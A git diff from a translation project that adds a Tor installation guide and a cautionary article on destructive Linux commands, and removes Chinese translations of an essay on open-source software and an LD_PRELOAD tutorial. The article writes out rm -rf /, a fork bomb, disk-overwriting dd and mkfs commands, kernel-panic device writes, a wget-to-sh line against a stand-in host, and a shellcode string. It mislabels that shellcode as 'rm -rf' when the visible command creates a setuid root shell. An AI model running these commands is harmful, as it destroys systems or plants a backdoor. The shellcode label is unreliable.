Once installed, we can than install Tor browser with the following command,
|
||||
|
||||
**$ sudo yum install tor**
|
||||
|
||||
### Ubuntu
|
||||
|
||||
For installing Tor network on Ubuntu machines, we need to add Official Tor repositories. We need to add the repo information to '/etc/apt/sources.list'
|
||||
|
||||
**$ sudo nano /etc/apt/sources.list**
|
||||
|
||||
Now add the repo information mentioned below based on your OS,
|
||||
|
||||
**Ubuntu 16.04**
|
||||
|
||||
**deb http://deb.torproject.org/torproject.org xenial main**
|
||||
**deb-src http://deb.torproject.org/torproject.org xenial main**
|
||||
|
||||
**Ubuntu 14.04**
|
||||
|
||||
**deb http://deb.torproject.org/torproject.org trusty main**
|
||||
**deb-src http://deb.torproject.org/torproject.org trusty main**
|
||||
|
||||
Next open the terminal & execute the following two commands to add the gpg keys used to sign the packages,
|
||||
|
||||
**$ gpg -keyserver keys.gnupg.net -recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89**
|
||||
**$ gpg -export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -**
|
||||
|
||||
Now run update & install the Tor network,
|
||||
|
||||
**$ sudo apt-get update**
|
||||
**$ sudo apt-get install tor deb.torproject.org-keyring**
|
||||
|
||||
### Debian
|
||||
|
||||
We can install Tor network on Debian without having to add any repositories. Just open the terminal & execute the following command as root,
|
||||
|
||||
**$ apt install tor**
|
||||
|
||||
###
|
||||
|
||||
### Tor Configuration
|
||||
|
||||
If your end game is only to secure the internet browsing & not anything else, than its better you use Tor Browser but if you need to secure your apps like Instant Messaging, IRC, Jabber etc than we need to configure those apps for secure communication. But Before we do that, let's check out some [**warning mentioned on Tor Website**][2]
|
||||
|
||||
- No torrents over Tor
|
||||
- Don't use any browser plugins with Tor
|
||||
- Use only HTTPS version of the websites
|
||||
- Don't open any document downloaded through Tor while online.
|
||||
- Use Tor bridges when you can
|
||||
|
||||
Now to configure any app to use Tor, for example jabber; firstly select the 'SOCKS proxy' rather than using the HTTP proxy & use port number 9050 or you can also use port 9150 (used by Tor browser).
|
||||
|
||||
![install tor network][4]
|
||||
|
||||
You can also configure Firefox browser to be used on Tor network. Open Firefox browser & goto 'Network Proxy ' settings in 'Preferences' under 'General' tab & make the proxy entry as follows,
|
||||
|
||||
![install tor network][6]
|
||||
|
||||
We can now access Firefox on Tor network with complete anonymity.
|
||||
|
||||
This was our tutorial on how we can install Tor network & use ti to surf the internet anonymously. Do mention you queries & suggestions in the comment box below.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/learn-install-tor-network-linux/
|
||||
|
||||
作者:[Shusain][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[1]:http://linuxtechlab.com/install-tor-browser-linux-ubuntu-centos/
|
||||
[2]:https://www.torproject.org/download/download.html.en#warning
|
||||
[4]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/12/tor-1-compressor.png?resize=333%2C240
|
||||
[6]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/12/tor-2-compressor.png?resize=730%2C640
|
183
sources/tech/20171219 The Linux commands you should NEVER use.md
Normal file
183
sources/tech/20171219 The Linux commands you should NEVER use.md
Normal file
@ -0,0 +1,183 @@
|
||||
The Linux commands you should NEVER use
|
||||
======
|
||||
Unless, of course, you like killing your machines.
|
||||
|
||||
Spider-Man's credo is, "With great power comes great responsibility." That's also a wise attitude for Linux system administrators to adopt.
|
||||
|
||||
No! Really! Thanks to DevOps and cloud orchestration, a Linux admin can control not merely a single server, but tens of thousands of server instances. With one stupid move--like [not patching Apache Struts][1]--you can wreck a multibillion-dollar enterprise.
|
||||
|
||||
Failing to stay on top of security patches is a strategic business problem that goes way above the pay grade of a system administrator. But there are many simple ways to blow up Linux servers, which do lie in the hands of sysadmins. It would be nice to imagine that only newbies make these mistakes--but we know better.
|
||||
|
||||
Here are infamous commands that enable anyone with root access to wreak havoc.
|
||||
|
||||
A word of caution: Never, ever run any of these on a production system. They will harm your system. Don't try this at home! Don't try it at the office, either.
|
||||
|
||||
That said, onward!
|
||||
|
||||
### rm -rf /
|
||||
|
||||
Want to ruin a Linux system in no time flat? You can't beat this classic "worst command ever." It deletes everything--and I mean everything--from your system.
|
||||
|
||||
Like most of these [Linux commands][2], the core program, `rm`, is very handy. It enables you to delete even the most stubborn files. But you're in deep trouble when you combine `rm` with those two flags: `-r`, which forces recursive deletion through all subdirectories, and `-f`, which forces deletion of read-only files without confirmation. If you run it from the / root directory, you'll wipe every last bit of data on your entire drive.
|
||||
|
||||
Just imagine trying to explain that to the boss!
|
||||
|
||||
Now, you might think, "I could never make such a dumb mistake." Oh, my friend, pride goes before a fall. Consider [this cautionary tale from a sysadmin on Reddit][3]:
|
||||
|
||||
> I've been in IT a long time, but today, in Linux, as root, I `rm -r` the wrong path.
|
||||
>
|
||||
> Long story short, I had to copy a bunch of dirs from one path to another and, as you do, I did a couple of `cp -R` to copy the needed about.
|
||||
>
|
||||
> In my wisdom, I tapped the up arrow a couple of times as the dirs to copy are similarly named but they're in amongst a whole bunch of other stuff.
|
||||
>
|
||||
> Anyway, I tapped too far and being distracted as I typed on Skype and Slack and WhatsApp web as well as taking a call from Sage, my brained auto-piloted in: `rm -R ./videodir/* ../companyvideodirwith651vidsin/`
|
||||
|
||||
And there went corporate video file after file into the void. Fortunately, after much frantic pounding of `control-C`, the sysadmin managed to stop the command before it deleted too many files. But let this be a warning to you: Anyone can make this mistake.
|
||||
|
||||
True, most modern systems warn you in great big letters before you make this blunder. However, if you are busy or distracted as you pound away on the keyboard, you can type your system into a black hole.
|
||||
|
||||
There are sneakier ways to get rm -rf. Consider the code below:
|
||||
|
||||
`char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"`
|
||||
|
||||
`"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"`
|
||||
|
||||
`"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"`
|
||||
|
||||
`"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"`
|
||||
|
||||
`"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"`
|
||||
|
||||
`"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"`
|
||||
|
||||
`"\x6e\x2f\x73\x68\x00\x2d\x63\x00"`
|
||||
|
||||
`"cp -p /bin/sh /tmp/.beyond; chmod 4755`
|
||||
|
||||
`/tmp/.beyond;";`
|
||||
|
||||
What is it? It's the hex version of `rm -rf`. Don't run any command unless you know what it is.
|
||||
|
||||
### Bash fork bomb
|
||||
|
||||
Since we are on the topic of odd-looking code, consider this line:
|
||||
```
|
||||
:(){ :|: & };:
|
||||
```
|
||||
|
||||
It may look cryptic to you, but to me, it looks like the infamous [Bash fork bomb][4]. All it does is start new Bash shells, over and over again, until all your system resources are consumed and the system crashes.
|
||||
|
||||
An up-to-date Linux system shouldn't do this. Note, I said shouldn't. I didn't say won't. Properly set up, Linux systems block this behavior from causing too much harm by setting user limits. Usually, users are restricted to allocate only the memory that the machine has available. But if you run the above (or some other [Bash fork bomb variants][5]) as root, you can still knock a server off until it's rebooted.
|
||||
|
||||
### Overwriting the hard drive with garbage
|
||||
|
||||
There are times you want to zap the data from a disk, but for that job, you should use a tool such as [Darik's Boot and Nuke (DBAN)][6].
|
||||
|
||||
But for just making a royal mess of your storage, it's hard to beat running:
|
||||
```
|
||||
Any command > /dev/hda
|
||||
```
|
||||
|
||||
When I say "any command," I mean any command with output. For example:
|
||||
```
|
||||
ls -la > /dev/hda
|
||||
```
|
||||
|
||||
…pipes the directory listing to your main storage device. Given time, and root privileges, this overwrites all the data on your drive. That's always a good way to start the day in a blind panic--or turn it into a [career-limiting crisis][7].
|
||||
|
||||
### Wipe that drive!
|
||||
|
||||
Another all-time favorite way to smoke storage is to run:
|
||||
```
|
||||
dd if=/dev/zero of=/dev/hda
|
||||
```
|
||||
|
||||
With this command, you're writing data to a drive. The `dd` command pulls its data from the special file, which outputs an infinity of zeros, and pours those zeros all over the hard drive.
|
||||
|
||||
Now /dev/zero may sound like a really silly idea, but it has real uses. For example, you can use it to [clear unused space in a partition with zeros][8]. This makes compressing an image of the partition much smaller for data transfer or archival uses.
|
||||
|
||||
On the other hand, its close relative, `dd if=/dev/random of=/dev/hda`, isn't good for much except ruining your day. If you ran this command (please don't), you would cover your storage with random crap. As a half-assed way to hide your secret plans to take over the office coffee machine, it's not bad, but DBAN is a better tool for that job.
|
||||
|
||||
### /dev/null for the loss
|
||||
|
||||
Perhaps it's because our data is precious to us and our confidence in backups is minimal, but many of these "Never do this!" Linux commands have the result of wiping a hard disk or other storage repository. Case in point: Another pair of ways to ruin your storage is to run `mv / /dev/null` or `>mv ` /dev/null`.
|
||||
|
||||
In the former case, you as the root user are sending all the drive's data into the ever-hungry maw of `/dev/null`. In the latter, you're just feeding your home directory into the same vault of emptiness. In either case, short of restoring from a backup, you won't be seeing any of that data ever again.
|
||||
|
||||
When it comes to containers, don't forget data persistence or data storage. 451 Research offers advice.
|
||||
|
||||
[Get the report][9]
|
||||
|
||||
Heck, accounting didn't really need up-to-date receivables files anyway, did they?
|
||||
|
||||
### Formatting the wrong drive
|
||||
|
||||
Sometimes you must format a drive with a command like:
|
||||
```
|
||||
mkfs.ext3 /dev/hda
|
||||
```
|
||||
|
||||
…which formats the primary hard drive with the ext3 file system. But, wait one darn second! What are you doing formatting your main drive! Aren't you using it?
|
||||
|
||||
Make doubly sure when you're formatting drives--be they solid state, flash, or good old ferrous oxide--that you're formatting the partition that really needs it and not one that's already in use.
|
||||
|
||||
### Kernel panics
|
||||
|
||||
Some Linux commands do not put your machine down for the long count. However, a variety of them can cause the kernel to panic. Normally, these failures are caused by hardware issues, but you can do it to yourself.
|
||||
|
||||
When you encounter a kernel panic, you need to reboot the system to get back to work. In some cases, that's a mild annoyance; in others--such as a production system under heavy load--it's a big deal. Examples include:
|
||||
```
|
||||
dd if=/dev/random of=/dev/port
|
||||
|
||||
echo 1 > /proc/sys/kernel/panic
|
||||
|
||||
cat /dev/port
|
||||
|
||||
cat /dev/zero > /dev/mem
|
||||
```
|
||||
|
||||
All of these cause kernel panics.
|
||||
|
||||
Never run a command unless you know what it's supposed to do, which reminds me…
|
||||
|
||||
### Be wary of unknown scripts
|
||||
|
||||
Young or lazy sysadmins like to borrow scripts written by other people. Why reinvent the wheel, right? So, they find a cool script that promises to automate and check all backups. They grab it with a command such as:
|
||||
```
|
||||
wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh
|
||||
```
|
||||
|
||||
This downloads the script and then shoots it over to the shell to run. No fuss, no muss, right? Wrong. That script may be poisoned with malware. Sure, Linux is safer than most operating systems by default, but if you run unknown code as root, anything can happen. The danger is not only in maliciousness; the script author's stupidity is equally as harmful. You can be bitten by someone else's undebugged code--because you didn't take the time to even read it through.
|
||||
|
||||
You'd never do something like that? Tell me, all those [container images you're running on Docker][10]? Do you know what they're really running? I know too many sysadmins who run containers without verifying what's really in them. Don't be like them.
|
||||
|
||||
### Shutdown
|
||||
|
||||
The moral of these stories is simple. With Linux, you get an enormous amount of control over your system. You can make your servers do almost anything. But you must make certain that you use that power conscientiously. If you don't, you can wreck not just your servers, but your job and your company. Be like Spider-Man, and use your power responsibly.
|
||||
|
||||
Did I miss any? Tweet me at [@sjvn][11] and [@enterprisenxt][12] to tell me which Linux commands are on your "[Never use this!][13]" list.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html
|
||||
|
||||
作者:[Steven Vaughan-Nichols][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.hpe.com/us/en/insights/contributors/steven-j-vaughan-nichols.html
|
||||
[1]:http://www.zdnet.com/article/equifax-blames-open-source-software-for-its-record-breaking-security-breach/
|
||||
[2]:https://www.hpe.com/us/en/insights/articles/16-linux-server-monitoring-commands-you-really-need-to-know-1703.html
|
||||
[3]:https://www.reddit.com/r/sysadmin/comments/732skq/after_21_years_i_finally_made_the_rm_boo_boo/
|
||||
[4]:https://www.cyberciti.biz/faq/understanding-bash-fork-bomb/
|
||||
[5]:https://unix.stackexchange.com/questions/283496/why-do-these-bash-fork-bombs-work-differently-and-what-is-the-significance-of
|
||||
[6]:https://dban.org/
|
||||
[7]:https://www.hpe.com/us/en/insights/articles/13-ways-to-tank-your-it-career-1707.html
|
||||
[8]:https://unix.stackexchange.com/questions/44234/clear-unused-space-with-zeros-ext3-ext4
|
||||
[9]:https://www.hpe.com/us/en/resources/solutions/enterprise-devops-containers.html?jumpid=in_insights~510287587~451_containers~badLinux
|
||||
[10]:https://www.oreilly.com/ideas/five-security-concerns-when-using-docker
|
||||
[11]:http://www.twitter.com/sjvn
|
||||
[12]:http://www.twitter.com/enterprisenxt
|
||||
[13]:https://www.youtube.com/watch?v=v79fYnuVzdI
|
@ -1,89 +0,0 @@
|
||||
# [因为这个我要点名批评 Hacker News ][14]
|
||||
|
||||
|
||||
> “实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗?
|
||||
不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员单方面的乐观主义。”
|
||||
>
|
||||
> — 出自 [Owen Astrachan][1] 教授于 2004 年 2 月 23 日在 [CPS 108][2] 上的讲座
|
||||
|
||||
[指责开源软件总是离奇难用已经不是一个新论点了][5]; 这样的论点之前就被很多比我更为雄辩的人提及过, 甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢?
|
||||
|
||||
在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为 [编写代码实现和一个跟 StackOverflow 一样的系统可以简单到爆][6],并自信的 [声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序][7],以此来证明这一切是多么容易。另一些人则插话说,[现有的][8][那些仿制产品][9] 就已经是一个很好的例证了。
|
||||
|
||||
秉承着自由讨论的精神,我们来假设一个场景。你在思考了一阵之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词 ([也就是大约每秒敲八个字母][10]),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。
|
||||
|
||||
或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭 StackOverflow 源代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄源 StackOverflow 代码用时的十倍时间来让我自己写 StackOverflow, 我可是打死也做不到。
|
||||
|
||||
_好的_,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow **大部分** 的功能呢?这总归会容易很多了吧。*
|
||||
|
||||
好的,问题是什么是 "大部分" 功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统,来显示大家对某个答案是赞同还是反对。因为只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且
|
||||
与 Markdown 接合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的 [那个超棒的编辑器][11] )。你还需要为所有控件购买或者设计一些小图标小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。
|
||||
|
||||
但是如果你实现了以上_所有_功能,可以说你_就已经_把要做的都做完了。
|
||||
|
||||
除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现对问题答案的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,以及他们的历史点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 Slashdot,Reddit 或是 StackOverflow 这些动作影响到。
|
||||
|
||||
在这之后!你会以为你基本已经大功告成了!
|
||||
|
||||
...为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的 CSS 设计,AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一摸一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。
|
||||
|
||||
那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢?
|
||||
|
||||
正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也同样是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码:
|
||||
|
||||
```
|
||||
create table QUESTION (ID identity primary key,
|
||||
TITLE varchar(255), --- 为什么我知道你认为是 255
|
||||
BODY text,
|
||||
UPVOTES integer not null default 0,
|
||||
DOWNVOTES integer not null default 0,
|
||||
USER integer references USER(ID));
|
||||
create table RESPONSE (ID identity primary key,
|
||||
BODY text,
|
||||
UPVOTES integer not null default 0,
|
||||
DOWNVOTES integer not null default 0,
|
||||
QUESTION integer references QUESTION(ID))
|
||||
```
|
||||
|
||||
如果你让这些开发者去实现 StackOverflow,进入他脑海中的就是上面的两个 SQL 表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登陆和注销功能,评论功能,投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登陆和评论的功能。
|
||||
|
||||
但这种简单的实现却_远远不能_体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 StackOverflow 的源码之后,我得以印证了自己的想法,StackOverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后_大量的_精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的_很少会去考虑到产品背后的打磨和雕琢工作_,因为他们认为_这些打磨和雕琢都是偶然的,甚至是无足轻重的。_
|
||||
|
||||
这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 StackOverflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遭遇种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 程序都在使用的流程和方案:即实现一个通用的机制, 提供以 Python 或 Php 为基础的一些系统API, 以便那些可以自如使用 Python 或 Php 的人可以轻松的通过这些编程接口来定制化他们自己的 Badge。而且老实说,PHP 和 Python 可是比任何可能的 GUI 接口都要好用和强大得多,为什么还要考虑 GUI 的方案呢?(出自开源开发者的想法)
|
||||
|
||||
同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何mod的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计(即要求用户必须拥有一个 OpenID 并知道如何使用它)在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的确是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。
|
||||
|
||||
|
||||
开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低售后维护支持的成本一样,懂行的消费者也会在他们购买这些产品之前就确保产品好用,以防在使用的时候不知所措,然后无奈的打电话给售后来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。
|
||||
|
||||
这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache,[Django][12],[PostgreSQL][13] 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而即使是最新版本的 ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。
|
||||
相比之下,MS SQL (微软的 SQL) 则不需要你手工配置以上的任何一样东西。至于 Apache ... 我的天,Apache 简直复杂到让我根本来不及去尝试给一个新用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机,MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也 _只是_ 一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项就 _恰恰在_ 这种基础构架的开发和创新上,这也正是驱使开发者为开源做贡献的最本真的动力。
|
||||
|
||||
|
||||
所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的再一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。
|
||||
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/
|
||||
|
||||
作者:[Benjamin Pollack][a]
|
||||
译者:[hopefully2333](https://github.com/hopefully2333)
|
||||
校对:[yunfengHe](https://github.com/yunfengHe)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://bitquabit.com/meta/about/
|
||||
[1]:http://www.cs.duke.edu/~ola/
|
||||
[2]:http://www.cs.duke.edu/courses/cps108/spring04/
|
||||
[3]:https://bitquabit.com/categories/programming
|
||||
[4]:https://bitquabit.com/categories/technology
|
||||
[5]:http://blog.bitquabit.com/2009/06/30/one-which-i-say-open-source-software-sucks/
|
||||
[6]:http://news.ycombinator.com/item?id=678501
|
||||
[7]:http://news.ycombinator.com/item?id=678704
|
||||
[8]:http://code.google.com/p/cnprog/
|
||||
[9]:http://code.google.com/p/soclone/
|
||||
[10]:http://en.wikipedia.org/wiki/Words_per_minute
|
||||
[11]:http://github.com/derobins/wmd/tree/master
|
||||
[12]:http://www.djangoproject.com/
|
||||
[13]:http://www.postgresql.org/
|
||||
[14]:https://bitquabit.com/post/one-which-i-call-out-hacker-news/
|
@ -1,212 +0,0 @@
|
||||
# 动态连接的诀窍:使用 LD_PRELOAD 去欺骗、注入特性和研究程序
|
||||
|
||||
**本文假设你具备基本的 C 技能**
|
||||
|
||||
Linux 完全在你的控制之中。从每个人的角度来看似乎并不总是这样,但是一个高级用户喜欢去控制它。我将向你展示一个基本的诀窍,在很大程度上你可以去影响大多数程序的行为,它并不仅是好玩,在有时候也很有用。
|
||||
|
||||
#### 一个让我们产生兴趣的示例
|
||||
|
||||
让我们以一个简单的示例开始。先乐趣,后科学。
|
||||
|
||||
|
||||
random_num.c:
|
||||
```
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <time.h>
|
||||
|
||||
int main(){
|
||||
srand(time(NULL));
|
||||
int i = 10;
|
||||
while(i--) printf("%d\n",rand()%100);
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
我相信,它足够简单吧。我不使用任何参数来编译它,如下所示:
|
||||
|
||||
> ```
|
||||
> gcc random_num.c -o random_num
|
||||
> ```
|
||||
|
||||
我希望它输出的结果是明确的 – 从 0-99 中选择的十个随机数字,希望每次你运行这个程序时它的输出都不相同。
|
||||
|
||||
现在,让我们假装真的不知道这个可执行程序的来源。也将它的源文件删除,或者把它移动到别的地方 – 我们已不再需要它了。我们将对这个程序的行为进行重大的修改,而你不需要接触到它的源代码也不需要重新编译它。
|
||||
|
||||
因此,让我们来创建另外一个简单的 C 文件:
|
||||
|
||||
|
||||
unrandom.c:
|
||||
```
|
||||
int rand(){
|
||||
return 42; //the most random number in the universe
|
||||
}
|
||||
```
|
||||
|
||||
我们将编译它进入一个共享库中。
|
||||
|
||||
> ```
|
||||
> gcc -shared -fPIC unrandom.c -o unrandom.so
|
||||
> ```
|
||||
|
||||
因此,现在我们已经有了一个可以输出一些随机数的应用程序,和一个定制的库,它使用一个常数值 42 实现一个 rand() 函数。现在 … 就像运行 `random_num` 一样,然后再观察结果:
|
||||
|
||||
> ```
|
||||
> LD_PRELOAD=$PWD/unrandom.so ./random_nums
|
||||
> ```
|
||||
|
||||
如果你想偷懒或者不想自动亲自动手(或者不知什么原因猜不出发生了什么),我来告诉你 – 它输出了十次常数 42。
|
||||
|
||||
它让你感到非常惊讶吧。
|
||||
|
||||
> ```
|
||||
> export LD_PRELOAD=$PWD/unrandom.so
|
||||
> ```
|
||||
|
||||
然后再以正常方式运行这个程序。一个未被改变的应用程序在一个正常的运行方式中,看上去受到了我们做的一个极小的库的影响 …
|
||||
|
||||
##### **等等,什么?刚刚发生了什么?**
|
||||
|
||||
是的,你说对了,我们的程序生成随机数失败了,因为它并没有使用 “真正的” rand(),而是使用了我们提供的 – 它每次都返回 42。
|
||||
|
||||
##### **但是,我们 *告诉* 它去使用真实的那个。我们设置它去使用真实的那个。另外,在创建那个程序的时候,假冒的 rand() 甚至并不存在!**
|
||||
|
||||
这并不完全正确。我们只能告诉它去使用 rand(),但是我们不能去选择哪个 rand() 是我们希望我们的程序去使用的。
|
||||
|
||||
当我们的程序启动后,(为程序提供需要的函数的)某些库被加载。我们可以使用 _ldd_ 去学习它是怎么工作的:
|
||||
|
||||
> ```
|
||||
> $ ldd random_nums
|
||||
> linux-vdso.so.1 => (0x00007fff4bdfe000)
|
||||
> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48c03ec000)
|
||||
> /lib64/ld-linux-x86-64.so.2 (0x00007f48c07e3000)
|
||||
> ```
|
||||
|
||||
